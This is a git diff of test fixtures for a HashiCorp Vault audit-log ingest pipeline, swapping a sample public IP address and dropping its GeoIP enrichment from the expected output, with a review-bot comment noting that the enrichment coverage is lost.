-{"time":"2020-12-01T20:29:04.36089379Z","type":"response","auth":{"client_token":"hmac-sha256:9cc3baa3c2bd7a4b233ca1fdcf69df91c8f2a9f14ddda54a4039190f581dd327","accessor":"hmac-sha256:eb605bd7f8a5ceb951b9ab42cae6d6c3f12f203cb2c2a78e33e899f77dceb931","display_name":"oidc-12349999999999999999","policies":["default","group-admin"],"token_policies":["default","group-admin"],"metadata":{"account_id":"12349999999999999999","email":"example@gmail.com","role":"gmail"},"entity_id":"e4f5c67a-6f7e-789d-ae56-a1fe3ae23046","token_type":"service","token_ttl":3600,"token_issue_time":"2020-12-01T20:28:40Z"},"request":{"id":"cd09708b-11cc-2985-648b-cfe262cf7e50","operation":"update","mount_type":"system","client_token":"hmac-sha256:9cc3baa3c2bd7a4b233ca1fdcf69df91c8f2a9f14ddda54a4039190f581dd327","client_token_accessor":"hmac-sha256:eb605bd7f8a5ceb951b9ab42cae6d6c3f12f203cb2c2a78e33e899f77dceb931","namespace":{"id":"root"},"path":"sys/capabilities-self","data":{"paths":["hmac-sha256:fd04b28916cb60f622b1ebce308b339b468f5da93fa735f985f4435049627a27"]},"remote_address":"156.33.241.5"},"response":{"mount_type":"system","data":{"capabilities":["hmac-sha256:b77b79078c7bad1402a1ec74613454fd85efa203f1aa557fd2a9718cfd4ef367","hmac-sha256:8d0bb80a69f442489908170e1831503c65b2f9d45a3250eac21fc16840416e5a","hmac-sha256:c5086738f6225235066f69681e94111d94a45a268e9f0c64c6105073e32e8176","hmac-sha256:3d439b7d92cbd8123fda8462716af05ae15710c8e2905eaba8d5452fccbad2f2","hmac-sha256:5622a2d8fedf53e4671d6f371c59e40f3379030815fd4bb4126fdedce5fc87bb"],"secret/metadata/apps/github-runner/ca-cert":["hmac-sha256:b77b79078c7bad1402a1ec74613454fd85efa203f1aa557fd2a9718cfd4ef367","hmac-sha256:8d0bb80a69f442489908170e1831503c65b2f9d45a3250eac21fc16840416e5a","hmac-sha256:c5086738f6225235066f69681e94111d94a45a268e9f0c64c6105073e32e8176","hmac-sha256:3d439b7d92cbd8123fda8462716af05ae15710c8e2905eaba8d5452fccbad2f2","hmac-sha256:5622a2d8fedf53e4671d6f371c59e40f3379030815fd4bb4126fdedce5fc87bb"]}}} 
+{"time":"2020-12-01T20:29:04.356625452Z","type":"request","auth":{"client_token":"hmac-sha256:9cc3baa3c2bd7a4b233ca1fdcf69df91c8f2a9f14ddda54a4039190f581dd327","accessor":"hmac-sha256:eb605bd7f8a5ceb951b9ab42cae6d6c3f12f203cb2c2a78e33e899f77dceb931","display_name":"oidc-12349999999999999999","policies":["default","group-admin"],"token_policies":["default","group-admin"],"metadata":{"account_id":"12349999999999999999","email":"example@gmail.com","role":"gmail"},"entity_id":"e4f5c67a-6f7e-789d-ae56-a1fe3ae23046","token_type":"service","token_ttl":3600,"token_issue_time":"2020-12-01T20:28:40Z"},"request":{"id":"cd09708b-11cc-2985-648b-cfe262cf7e50","operation":"update","mount_type":"system","client_token":"hmac-sha256:9cc3baa3c2bd7a4b233ca1fdcf69df91c8f2a9f14ddda54a4039190f581dd327","client_token_accessor":"hmac-sha256:eb605bd7f8a5ceb951b9ab42cae6d6c3f12f203cb2c2a78e33e899f77dceb931","namespace":{"id":"root"},"path":"sys/capabilities-self","data":{"paths":["hmac-sha256:fd04b28916cb60f622b1ebce308b339b468f5da93fa735f985f4435049627a27"]},"remote_address":"67.43.156.13"}} 
+{"time":"2020-12-01T20:29:04.36089379Z","type":"response","auth":{"client_token":"hmac-sha256:9cc3baa3c2bd7a4b233ca1fdcf69df91c8f2a9f14ddda54a4039190f581dd327","accessor":"hmac-sha256:eb605bd7f8a5ceb951b9ab42cae6d6c3f12f203cb2c2a78e33e899f77dceb931","display_name":"oidc-12349999999999999999","policies":["default","group-admin"],"token_policies":["default","group-admin"],"metadata":{"account_id":"12349999999999999999","email":"example@gmail.com","role":"gmail"},"entity_id":"e4f5c67a-6f7e-789d-ae56-a1fe3ae23046","token_type":"service","token_ttl":3600,"token_issue_time":"2020-12-01T20:28:40Z"},"request":{"id":"cd09708b-11cc-2985-648b-cfe262cf7e50","operation":"update","mount_type":"system","client_token":"hmac-sha256:9cc3baa3c2bd7a4b233ca1fdcf69df91c8f2a9f14ddda54a4039190f581dd327","client_token_accessor":"hmac-sha256:eb605bd7f8a5ceb951b9ab42cae6d6c3f12f203cb2c2a78e33e899f77dceb931","namespace":{"id":"root"},"path":"sys/capabilities-self","data":{"paths":["hmac-sha256:fd04b28916cb60f622b1ebce308b339b468f5da93fa735f985f4435049627a27"]},"remote_address":"67.43.156.13"},"response":{"mount_type":"system","data":{"capabilities":["hmac-sha256:b77b79078c7bad1402a1ec74613454fd85efa203f1aa557fd2a9718cfd4ef367","hmac-sha256:8d0bb80a69f442489908170e1831503c65b2f9d45a3250eac21fc16840416e5a","hmac-sha256:c5086738f6225235066f69681e94111d94a45a268e9f0c64c6105073e32e8176","hmac-sha256:3d439b7d92cbd8123fda8462716af05ae15710c8e2905eaba8d5452fccbad2f2","hmac-sha256:5622a2d8fedf53e4671d6f371c59e40f3379030815fd4bb4126fdedce5fc87bb"],"secret/metadata/apps/github-runner/ca-cert":["hmac-sha256:b77b79078c7bad1402a1ec74613454fd85efa203f1aa557fd2a9718cfd4ef367","hmac-sha256:8d0bb80a69f442489908170e1831503c65b2f9d45a3250eac21fc16840416e5a","hmac-sha256:c5086738f6225235066f69681e94111d94a45a268e9f0c64c6105073e32e8176","hmac-sha256:3d439b7d92cbd8123fda8462716af05ae15710c8e2905eaba8d5452fccbad2f2","hmac-sha256:5622a2d8fedf53e4671d6f371c59e40f3379030815fd4bb4126fdedce5fc87bb"]}}} 
 {"time":"2021-07-19T17:19:00.673898225Z","type":"request","auth":{"token_type":"default"},"request":{"id":"24ac580b-805a-d9ee-4d0d-7046932f4e05","operation":"update","mount_type":"pki","client_token":"hmac-sha256:db417023d954a03aea8f56a3daf35460aa51920337420c7c22bcbb6b10852f23","namespace":{"id":"root"},"path":"internal-ca/issue/internal-server","data":{"alt_names":"hmac-sha256:9760c514cdbf3ec61fa8d375643f29a78640528ddbbef6a49053ef9de6251eee","common_name":"hmac-sha256:bc800a949f7b2fe6401884da3a085de232365d7b508d741198fa2d88815f6d7c","ip_sans":"hmac-sha256:b6d902ee3c49cae1cfa8c9172f649716f802a4186c686b813bd344077fe0b5b2"},"remote_address":"10.6.8.34"},"error":"permission denied"}
 {"time":"2021-07-19T17:19:00.674663552Z","type":"response","auth":{"token_type":"default"},"request":{"id":"24ac580b-805a-d9ee-4d0d-7046932f4e05","operation":"update","mount_type":"pki","client_token":"hmac-sha256:db417023d954a03aea8f56a3daf35460aa51920337420c7c22bcbb6b10852f23","namespace":{"id":"root"},"path":"internal-ca/issue/internal-server","data":{"alt_names":"hmac-sha256:9760c514cdbf3ec61fa8d375643f29a78640528ddbbef6a49053ef9de6251eee","common_name":"hmac-sha256:bc800a949f7b2fe6401884da3a085de232365d7b508d741198fa2d88815f6d7c","ip_sans":"hmac-sha256:b6d902ee3c49cae1cfa8c9172f649716f802a4186c686b813bd344077fe0b5b2"},"remote_address":"10.6.8.34"},"response":{"mount_type":"pki","data":{"error":"hmac-sha256:409ef1533baffc8e15cd4424780c9aba5d10f168b8d641f111da43e7955451fa"}},"error":"1 error occurred:\n\t* permission denied\n\n"}
 {"time":"2021-06-29T17:26:11.402530449Z","type":"request","auth":{"client_token":"hmac-sha256:95b624915ff8dd55a4028bb57d1af8c6d487a99033b507b99a5a6e943b4933ef","accessor":"hmac-sha256:8fa4f7f3d1fd812064950025cde2b1565829a9dc5075253399e5ede8f8a1d98e","display_name":"token-375f9cb3-4355-42c7-eab5-029f8a310ca7-runner","policies":["app-continuous-delivery","app-github-runner","default"],"token_policies":["app-continuous-delivery","app-github-runner","default"],"metadata":{"AllocationID":"375f9cb3-4355-42c7-eab5-029f8a310ca7","Namespace":"","NodeID":"b70676cb-731b-976b-edc4-a5b1bb963fe4","Task":"runner"},"token_type":"service","token_ttl":259200,"token_issue_time":"2021-04-29T21:53:46Z"},"request":{"id":"0042ad1b-1400-7eb7-5e25-1dfc898c1998","operation":"read","mount_type":"kv","client_token":"hmac-sha256:95b624915ff8dd55a4028bb57d1af8c6d487a99033b507b99a5a6e943b4933ef","client_token_accessor":"hmac-sha256:8fa4f7f3d1fd812064950025cde2b1565829a9dc5075253399e5ede8f8a1d98e","namespace":{"id":"root"},"path":"secret/data/apps/continuous-delivery/aws-bucket-sse-c","remote_address":"10.6.8.36"}}
diff --git a/packages/hashicorp_vault/data_stream/audit/_dev/test/pipeline/test-audit.log-expected.json b/packages/hashicorp_vault/data_stream/audit/_dev/test/pipeline/test-audit.log-expected.json
index 15f28f4a8ab..f8156983e31 100644
--- a/packages/hashicorp_vault/data_stream/audit/_dev/test/pipeline/test-audit.log-expected.json
+++ b/packages/hashicorp_vault/data_stream/audit/_dev/test/pipeline/test-audit.log-expected.json
@@ -21,7 +21,7 @@
 },
 "id": "cd09708b-11cc-2985-648b-cfe262cf7e50",
 "mount_type": "system",
- "remote_address": "156.33.241.5",
+ "remote_address": "67.43.156.13",
 "client_token_accessor": "hmac-sha256:eb605bd7f8a5ceb951b9ab42cae6d6c3f12f203cb2c2a78e33e899f77dceb931",
 "operation": "update"
 },
@@ -51,33 +51,15 @@ }, "related": { "ip": [ - "156.33.241.5" + "67.43.156.13" ] }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-DC", - "city_name": "Washington", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "District of Columbia", - "location": { - "lon": -76.9882, - "lat": 38.9034 - } - }, - "as": { - "number": 3495, - "organization": { - "name": "US Senate" - } - }, - "ip": "156.33.241.5" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-07-22T19:55:04.277138800Z", - "original": "{\"time\":\"2020-12-01T20:29:04.356625452Z\",\"type\":\"request\",\"auth\":{\"client_token\":\"hmac-sha256:9cc3baa3c2bd7a4b233ca1fdcf69df91c8f2a9f14ddda54a4039190f581dd327\",\"accessor\":\"hmac-sha256:eb605bd7f8a5ceb951b9ab42cae6d6c3f12f203cb2c2a78e33e899f77dceb931\",\"display_name\":\"oidc-12349999999999999999\",\"policies\":[\"default\",\"group-admin\"],\"token_policies\":[\"default\",\"group-admin\"],\"metadata\":{\"account_id\":\"12349999999999999999\",\"email\":\"example@gmail.com\",\"role\":\"gmail\"},\"entity_id\":\"e4f5c67a-6f7e-789d-ae56-a1fe3ae23046\",\"token_type\":\"service\",\"token_ttl\":3600,\"token_issue_time\":\"2020-12-01T20:28:40Z\"},\"request\":{\"id\":\"cd09708b-11cc-2985-648b-cfe262cf7e50\",\"operation\":\"update\",\"mount_type\":\"system\",\"client_token\":\"hmac-sha256:9cc3baa3c2bd7a4b233ca1fdcf69df91c8f2a9f14ddda54a4039190f581dd327\",\"client_token_accessor\":\"hmac-sha256:eb605bd7f8a5ceb951b9ab42cae6d6c3f12f203cb2c2a78e33e899f77dceb931\",\"namespace\":{\"id\":\"root\"},\"path\":\"sys/capabilities-self\",\"data\":{\"paths\":[\"hmac-sha256:fd04b28916cb60f622b1ebce308b339b468f5da93fa735f985f4435049627a27\"]},\"remote_address\":\"156.33.241.5\"}}", + "ingested": "2021-12-09T13:39:31.089175500Z", + "original": 
"{\"time\":\"2020-12-01T20:29:04.356625452Z\",\"type\":\"request\",\"auth\":{\"client_token\":\"hmac-sha256:9cc3baa3c2bd7a4b233ca1fdcf69df91c8f2a9f14ddda54a4039190f581dd327\",\"accessor\":\"hmac-sha256:eb605bd7f8a5ceb951b9ab42cae6d6c3f12f203cb2c2a78e33e899f77dceb931\",\"display_name\":\"oidc-12349999999999999999\",\"policies\":[\"default\",\"group-admin\"],\"token_policies\":[\"default\",\"group-admin\"],\"metadata\":{\"account_id\":\"12349999999999999999\",\"email\":\"example@gmail.com\",\"role\":\"gmail\"},\"entity_id\":\"e4f5c67a-6f7e-789d-ae56-a1fe3ae23046\",\"token_type\":\"service\",\"token_ttl\":3600,\"token_issue_time\":\"2020-12-01T20:28:40Z\"},\"request\":{\"id\":\"cd09708b-11cc-2985-648b-cfe262cf7e50\",\"operation\":\"update\",\"mount_type\":\"system\",\"client_token\":\"hmac-sha256:9cc3baa3c2bd7a4b233ca1fdcf69df91c8f2a9f14ddda54a4039190f581dd327\",\"client_token_accessor\":\"hmac-sha256:eb605bd7f8a5ceb951b9ab42cae6d6c3f12f203cb2c2a78e33e899f77dceb931\",\"namespace\":{\"id\":\"root\"},\"path\":\"sys/capabilities-self\",\"data\":{\"paths\":[\"hmac-sha256:fd04b28916cb60f622b1ebce308b339b468f5da93fa735f985f4435049627a27\"]},\"remote_address\":\"67.43.156.13\"}}", "kind": "event", "action": "update", "id": "cd09708b-11cc-2985-648b-cfe262cf7e50", @@ -117,7 +99,7 @@ }, "id": "cd09708b-11cc-2985-648b-cfe262cf7e50", "mount_type": "system", - "remote_address": "156.33.241.5", + "remote_address": "67.43.156.13", "client_token_accessor": "hmac-sha256:eb605bd7f8a5ceb951b9ab42cae6d6c3f12f203cb2c2a78e33e899f77dceb931", "operation": "update" }, 
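Review bot: The regenerated expected output drops the entire `source.geo` and `source.as` objects for the public address (this hunk, and again in the `@@ -167,33 +149,15 @@` hunk that follows), so the file now asserts only `"source": { "ip": "67.43.156.13" }` and the pipeline's GeoIP and AS enrichment is no longer covered by this test. If 67.43.156.13 belongs to the "supported subset" the commit message refers to, the expected file should carry that address's geo and AS values rather than none; if the output was produced in an environment without the test GeoIP database, the fixture presumably needs regenerating with it. Either way, confirm that the enrichment is exercised before merging, since a regression in the geoip processor would otherwise pass this test silently. The `event.ingested` rewrites across the same file are run-time noise unrelated to the fix; if the test harness can ignore that field, the fixture diffs become limited to the intended change.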
@@ -167,33 +149,15 @@ }, "related": { "ip": [ - "156.33.241.5" + "67.43.156.13" ] }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-DC", - "city_name": "Washington", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "District of Columbia", - "location": { - "lon": -76.9882, - "lat": 38.9034 - } - }, - "as": { - "number": 3495, - "organization": { - "name": "US Senate" - } - }, - "ip": "156.33.241.5" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-07-22T19:55:04.277142479Z", - "original": "{\"time\":\"2020-12-01T20:29:04.36089379Z\",\"type\":\"response\",\"auth\":{\"client_token\":\"hmac-sha256:9cc3baa3c2bd7a4b233ca1fdcf69df91c8f2a9f14ddda54a4039190f581dd327\",\"accessor\":\"hmac-sha256:eb605bd7f8a5ceb951b9ab42cae6d6c3f12f203cb2c2a78e33e899f77dceb931\",\"display_name\":\"oidc-12349999999999999999\",\"policies\":[\"default\",\"group-admin\"],\"token_policies\":[\"default\",\"group-admin\"],\"metadata\":{\"account_id\":\"12349999999999999999\",\"email\":\"example@gmail.com\",\"role\":\"gmail\"},\"entity_id\":\"e4f5c67a-6f7e-789d-ae56-a1fe3ae23046\",\"token_type\":\"service\",\"token_ttl\":3600,\"token_issue_time\":\"2020-12-01T20:28:40Z\"},\"request\":{\"id\":\"cd09708b-11cc-2985-648b-cfe262cf7e50\",\"operation\":\"update\",\"mount_type\":\"system\",\"client_token\":\"hmac-sha256:9cc3baa3c2bd7a4b233ca1fdcf69df91c8f2a9f14ddda54a4039190f581dd327\",\"client_token_accessor\":\"hmac-sha256:eb605bd7f8a5ceb951b9ab42cae6d6c3f12f203cb2c2a78e33e899f77dceb931\",\"namespace\":{\"id\":\"root\"},\"path\":\"sys/capabilities-self\",\"data\":{\"paths\":[\"hmac-sha256:fd04b28916cb60f622b1ebce308b339b468f5da93fa735f985f4435049627a27\"]},\"remote_address\":\"156.33.241.5\"},\"response\":{\"mount_type\":\"system\",\"data\":{\"capabilities\":[\"hmac-sha256:b77b79078c7bad1402a1ec74613454fd85efa203f1aa557fd2a9718cfd4ef367\",\"hmac-sha256:8d0bb80a69f442489908170e1831503c65b2f9d45a3250eac21fc16840416e5a\",\"hmac-sha256
:c5086738f6225235066f69681e94111d94a45a268e9f0c64c6105073e32e8176\",\"hmac-sha256:3d439b7d92cbd8123fda8462716af05ae15710c8e2905eaba8d5452fccbad2f2\",\"hmac-sha256:5622a2d8fedf53e4671d6f371c59e40f3379030815fd4bb4126fdedce5fc87bb\"],\"secret/metadata/apps/github-runner/ca-cert\":[\"hmac-sha256:b77b79078c7bad1402a1ec74613454fd85efa203f1aa557fd2a9718cfd4ef367\",\"hmac-sha256:8d0bb80a69f442489908170e1831503c65b2f9d45a3250eac21fc16840416e5a\",\"hmac-sha256:c5086738f6225235066f69681e94111d94a45a268e9f0c64c6105073e32e8176\",\"hmac-sha256:3d439b7d92cbd8123fda8462716af05ae15710c8e2905eaba8d5452fccbad2f2\",\"hmac-sha256:5622a2d8fedf53e4671d6f371c59e40f3379030815fd4bb4126fdedce5fc87bb\"]}}}", + "ingested": "2021-12-09T13:39:31.089185200Z", + "original": "{\"time\":\"2020-12-01T20:29:04.36089379Z\",\"type\":\"response\",\"auth\":{\"client_token\":\"hmac-sha256:9cc3baa3c2bd7a4b233ca1fdcf69df91c8f2a9f14ddda54a4039190f581dd327\",\"accessor\":\"hmac-sha256:eb605bd7f8a5ceb951b9ab42cae6d6c3f12f203cb2c2a78e33e899f77dceb931\",\"display_name\":\"oidc-12349999999999999999\",\"policies\":[\"default\",\"group-admin\"],\"token_policies\":[\"default\",\"group-admin\"],\"metadata\":{\"account_id\":\"12349999999999999999\",\"email\":\"example@gmail.com\",\"role\":\"gmail\"},\"entity_id\":\"e4f5c67a-6f7e-789d-ae56-a1fe3ae23046\",\"token_type\":\"service\",\"token_ttl\":3600,\"token_issue_time\":\"2020-12-01T20:28:40Z\"},\"request\":{\"id\":\"cd09708b-11cc-2985-648b-cfe262cf7e50\",\"operation\":\"update\",\"mount_type\":\"system\",\"client_token\":\"hmac-sha256:9cc3baa3c2bd7a4b233ca1fdcf69df91c8f2a9f14ddda54a4039190f581dd327\",\"client_token_accessor\":\"hmac-sha256:eb605bd7f8a5ceb951b9ab42cae6d6c3f12f203cb2c2a78e33e899f77dceb931\",\"namespace\":{\"id\":\"root\"},\"path\":\"sys/capabilities-self\",\"data\":{\"paths\":[\"hmac-sha256:fd04b28916cb60f622b1ebce308b339b468f5da93fa735f985f4435049627a27\"]},\"remote_address\":\"67.43.156.13\"},\"response\":{\"mount_type\":\"system\",\"data\":{\"capabilit
ies\":[\"hmac-sha256:b77b79078c7bad1402a1ec74613454fd85efa203f1aa557fd2a9718cfd4ef367\",\"hmac-sha256:8d0bb80a69f442489908170e1831503c65b2f9d45a3250eac21fc16840416e5a\",\"hmac-sha256:c5086738f6225235066f69681e94111d94a45a268e9f0c64c6105073e32e8176\",\"hmac-sha256:3d439b7d92cbd8123fda8462716af05ae15710c8e2905eaba8d5452fccbad2f2\",\"hmac-sha256:5622a2d8fedf53e4671d6f371c59e40f3379030815fd4bb4126fdedce5fc87bb\"],\"secret/metadata/apps/github-runner/ca-cert\":[\"hmac-sha256:b77b79078c7bad1402a1ec74613454fd85efa203f1aa557fd2a9718cfd4ef367\",\"hmac-sha256:8d0bb80a69f442489908170e1831503c65b2f9d45a3250eac21fc16840416e5a\",\"hmac-sha256:c5086738f6225235066f69681e94111d94a45a268e9f0c64c6105073e32e8176\",\"hmac-sha256:3d439b7d92cbd8123fda8462716af05ae15710c8e2905eaba8d5452fccbad2f2\",\"hmac-sha256:5622a2d8fedf53e4671d6f371c59e40f3379030815fd4bb4126fdedce5fc87bb\"]}}}", "kind": "event", "action": "update", "id": "cd09708b-11cc-2985-648b-cfe262cf7e50", @@ -252,7 +216,7 @@ "ip": "10.6.8.34" }, "event": { - "ingested": "2021-07-22T19:55:04.277144209Z", + "ingested": "2021-12-09T13:39:31.089189500Z", "original": "{\"time\":\"2021-07-19T17:19:00.673898225Z\",\"type\":\"request\",\"auth\":{\"token_type\":\"default\"},\"request\":{\"id\":\"24ac580b-805a-d9ee-4d0d-7046932f4e05\",\"operation\":\"update\",\"mount_type\":\"pki\",\"client_token\":\"hmac-sha256:db417023d954a03aea8f56a3daf35460aa51920337420c7c22bcbb6b10852f23\",\"namespace\":{\"id\":\"root\"},\"path\":\"internal-ca/issue/internal-server\",\"data\":{\"alt_names\":\"hmac-sha256:9760c514cdbf3ec61fa8d375643f29a78640528ddbbef6a49053ef9de6251eee\",\"common_name\":\"hmac-sha256:bc800a949f7b2fe6401884da3a085de232365d7b508d741198fa2d88815f6d7c\",\"ip_sans\":\"hmac-sha256:b6d902ee3c49cae1cfa8c9172f649716f802a4186c686b813bd344077fe0b5b2\"},\"remote_address\":\"10.6.8.34\"},\"error\":\"permission denied\"}", "kind": "event", "action": "update", 
@@ -317,7 +281,7 @@
 "ip": "10.6.8.34"
 },
 "event": {
- "ingested": "2021-07-22T19:55:04.277145878Z",
+ "ingested": "2021-12-09T13:39:31.089194600Z",
 "original": "{\"time\":\"2021-07-19T17:19:00.674663552Z\",\"type\":\"response\",\"auth\":{\"token_type\":\"default\"},\"request\":{\"id\":\"24ac580b-805a-d9ee-4d0d-7046932f4e05\",\"operation\":\"update\",\"mount_type\":\"pki\",\"client_token\":\"hmac-sha256:db417023d954a03aea8f56a3daf35460aa51920337420c7c22bcbb6b10852f23\",\"namespace\":{\"id\":\"root\"},\"path\":\"internal-ca/issue/internal-server\",\"data\":{\"alt_names\":\"hmac-sha256:9760c514cdbf3ec61fa8d375643f29a78640528ddbbef6a49053ef9de6251eee\",\"common_name\":\"hmac-sha256:bc800a949f7b2fe6401884da3a085de232365d7b508d741198fa2d88815f6d7c\",\"ip_sans\":\"hmac-sha256:b6d902ee3c49cae1cfa8c9172f649716f802a4186c686b813bd344077fe0b5b2\"},\"remote_address\":\"10.6.8.34\"},\"response\":{\"mount_type\":\"pki\",\"data\":{\"error\":\"hmac-sha256:409ef1533baffc8e15cd4424780c9aba5d10f168b8d641f111da43e7955451fa\"}},\"error\":\"1 error occurred:\\n\\t* permission denied\\n\\n\"}",
 "kind": "event",
 "action": "update",
@@ -392,7 +356,7 @@
 "ip": "10.6.8.36"
 },
 "event": {
- "ingested": "2021-07-22T19:55:04.277147572Z",
+ "ingested": "2021-12-09T13:39:31.089198700Z",
 "original": "{\"time\":\"2021-06-29T17:26:11.402530449Z\",\"type\":\"request\",\"auth\":{\"client_token\":\"hmac-sha256:95b624915ff8dd55a4028bb57d1af8c6d487a99033b507b99a5a6e943b4933ef\",\"accessor\":\"hmac-sha256:8fa4f7f3d1fd812064950025cde2b1565829a9dc5075253399e5ede8f8a1d98e\",\"display_name\":\"token-375f9cb3-4355-42c7-eab5-029f8a310ca7-runner\",\"policies\":[\"app-continuous-delivery\",\"app-github-runner\",\"default\"],\"token_policies\":[\"app-continuous-delivery\",\"app-github-runner\",\"default\"],\"metadata\":{\"AllocationID\":\"375f9cb3-4355-42c7-eab5-029f8a310ca7\",\"Namespace\":\"\",\"NodeID\":\"b70676cb-731b-976b-edc4-a5b1bb963fe4\",\"Task\":\"runner\"},\"token_type\":\"service\",\"token_ttl\":259200,\"token_issue_time\":\"2021-04-29T21:53:46Z\"},\"request\":{\"id\":\"0042ad1b-1400-7eb7-5e25-1dfc898c1998\",\"operation\":\"read\",\"mount_type\":\"kv\",\"client_token\":\"hmac-sha256:95b624915ff8dd55a4028bb57d1af8c6d487a99033b507b99a5a6e943b4933ef\",\"client_token_accessor\":\"hmac-sha256:8fa4f7f3d1fd812064950025cde2b1565829a9dc5075253399e5ede8f8a1d98e\",\"namespace\":{\"id\":\"root\"},\"path\":\"secret/data/apps/continuous-delivery/aws-bucket-sse-c\",\"remote_address\":\"10.6.8.36\"}}",
 "kind": "event",
 "action": "read",
@@ -490,7 +454,7 @@ "ip": "10.6.8.36" }, "event": { - "ingested": "2021-07-22T19:55:04.277163317Z", + "ingested": "2021-12-09T13:39:31.089204100Z", "original": "{\"time\":\"2021-06-29T17:26:11.409840527Z\",\"type\":\"response\",\"auth\":{\"client_token\":\"hmac-sha256:95b624915ff8dd55a4028bb57d1af8c6d487a99033b507b99a5a6e943b4933ef\",\"accessor\":\"hmac-sha256:8fa4f7f3d1fd812064950025cde2b1565829a9dc5075253399e5ede8f8a1d98e\",\"display_name\":\"token-375f9cb3-4355-42c7-eab5-029f8a310ca7-runner\",\"policies\":[\"app-continuous-delivery\",\"app-github-runner\",\"default\"],\"token_policies\":[\"app-continuous-delivery\",\"app-github-runner\",\"default\"],\"metadata\":{\"AllocationID\":\"375f9cb3-4355-42c7-eab5-029f8a310ca7\",\"Namespace\":\"\",\"NodeID\":\"b70676cb-731b-976b-edc4-a5b1bb963fe4\",\"Task\":\"runner\"},\"token_type\":\"service\",\"token_ttl\":259200,\"token_issue_time\":\"2021-04-29T21:53:46Z\"},\"request\":{\"id\":\"0042ad1b-1400-7eb7-5e25-1dfc898c1998\",\"operation\":\"read\",\"mount_type\":\"kv\",\"client_token\":\"hmac-sha256:95b624915ff8dd55a4028bb57d1af8c6d487a99033b507b99a5a6e943b4933ef\",\"client_token_accessor\":\"hmac-sha256:8fa4f7f3d1fd812064950025cde2b1565829a9dc5075253399e5ede8f8a1d98e\",\"namespace\":{\"id\":\"root\"},\"path\":\"secret/data/apps/continuous-delivery/aws-bucket-sse-c\",\"remote_address\":\"10.6.8.36\"},\"response\":{\"mount_type\":\"kv\",\"data\":{\"data\":{\"customer_key\":\"hmac-sha256:85d3c6e705ea04f49772b92cc7335e34c53f0264a6d75bba3ab95bad22ca5bd1\"},\"metadata\":{\"created_time\":\"hmac-sha256:9c910646d7399704ee015b4247b374bfb950282339d902a221b1ff4c83b13ee7\",\"deletion_time\":\"hmac-sha256:17a84bc5c1c7ee851af0069663ab9de3c879107724470fa34fc0b5418fb653db\",\"destroyed\":false,\"version\":1}}}}", "kind": "event", "action": "read", 
@@ -572,7 +536,7 @@
 "ip": "10.6.8.34"
 },
 "event": {
- "ingested": "2021-07-22T19:55:04.277164880Z",
+ "ingested": "2021-12-09T13:39:31.089259300Z",
 "original": "{\"time\":\"2021-06-29T18:01:29.545476939Z\",\"type\":\"request\",\"auth\":{\"client_token\":\"hmac-sha256:f69c28fde8609df2a0ec6a316c0293179fa922a8a3a660a314859e6cff8e5fef\",\"accessor\":\"hmac-sha256:2ee197e25b333d83ba45d0c40aca153e0ad6c9e42b04b6de6a5b5b575de58771\",\"display_name\":\"token-c1d6c089-2f46-ff11-5988-38636bddf8d9-homeassistant\",\"policies\":[\"app-home-assistant\",\"default\"],\"token_policies\":[\"app-home-assistant\",\"default\"],\"metadata\":{\"AllocationID\":\"c1d6c089-2f46-ff11-5988-38636bddf8d9\",\"Namespace\":\"\",\"NodeID\":\"a28cef3a-f9e6-ad7d-bc5f-2c5ac27eec51\",\"Task\":\"homeassistant\"},\"token_type\":\"service\",\"token_ttl\":259200,\"token_issue_time\":\"2021-06-24T21:22:03Z\"},\"request\":{\"id\":\"3aa3f349-b55a-53e3-a795-dd4137d64299\",\"operation\":\"read\",\"mount_type\":\"kv\",\"client_token\":\"hmac-sha256:f69c28fde8609df2a0ec6a316c0293179fa922a8a3a660a314859e6cff8e5fef\",\"client_token_accessor\":\"hmac-sha256:2ee197e25b333d83ba45d0c40aca153e0ad6c9e42b04b6de6a5b5b575de58771\",\"namespace\":{\"id\":\"root\"},\"path\":\"secret/data/apps/home-assistant/secrets_yaml\",\"remote_address\":\"10.6.8.34\"}}",
 "kind": "event",
 "action": "read",
@@ -698,7 +662,7 @@ "ip": "10.6.8.34" }, "event": { - "ingested": "2021-07-22T19:55:04.277166410Z", + "ingested": "2021-12-09T13:39:31.089265900Z", "original": "{\"time\":\"2021-06-29T18:01:29.547355273Z\",\"type\":\"response\",\"auth\":{\"client_token\":\"hmac-sha256:f69c28fde8609df2a0ec6a316c0293179fa922a8a3a660a314859e6cff8e5fef\",\"accessor\":\"hmac-sha256:2ee197e25b333d83ba45d0c40aca153e0ad6c9e42b04b6de6a5b5b575de58771\",\"display_name\":\"token-c1d6c089-2f46-ff11-5988-38636bddf8d9-homeassistant\",\"policies\":[\"app-home-assistant\",\"default\"],\"token_policies\":[\"app-home-assistant\",\"default\"],\"metadata\":{\"AllocationID\":\"c1d6c089-2f46-ff11-5988-38636bddf8d9\",\"Namespace\":\"\",\"NodeID\":\"a28cef3a-f9e6-ad7d-bc5f-2c5ac27eec51\",\"Task\":\"homeassistant\"},\"token_type\":\"service\",\"token_ttl\":259200,\"token_issue_time\":\"2021-06-24T21:22:03Z\"},\"request\":{\"id\":\"3aa3f349-b55a-53e3-a795-dd4137d64299\",\"operation\":\"read\",\"mount_type\":\"kv\",\"client_token\":\"hmac-sha256:f69c28fde8609df2a0ec6a316c0293179fa922a8a3a660a314859e6cff8e5fef\",\"client_token_accessor\":\"hmac-sha256:2ee197e25b333d83ba45d0c40aca153e0ad6c9e42b04b6de6a5b5b575de58771\",\"namespace\":{\"id\":\"root\"},\"path\":\"secret/data/apps/home-assistant/secrets_yaml\",\"remote_address\":\"10.6.8.34\"},\"response\":{\"mount_type\":\"kv\",\"data\":{\"data\":{\"aladdin_connect_password\":\"hmac-sha256:f3a85a98373fa879041a438606e38773fdfaca9d99e2a1ee08183a2cb8fc9a17\",\"aladdin_connect_username\":\"hmac-sha256:b3c982a71d17164325f4ef6a9831a132e1bb789833fc6d1ecab5d36bc71df112\",\"elasticsearch_password\":\"hmac-sha256:8d2328e2c80428977858c0a80c6624c7910dd7da0b74c8d33e4d8d22fc0e9ad1\",\"elasticsearch_url\":\"hmac-sha256:c63aa2b5d15069aa9ff53eb1b6f4418a21a87c4fe508655d7f396b4bdf73492c\",\"elasticsearch_username\":\"hmac-sha256:bb7bdfaa02957aaf85efd2ea4585e05aa1ccb4594eb6820078bf8df46d123133\",\"rest_notify_c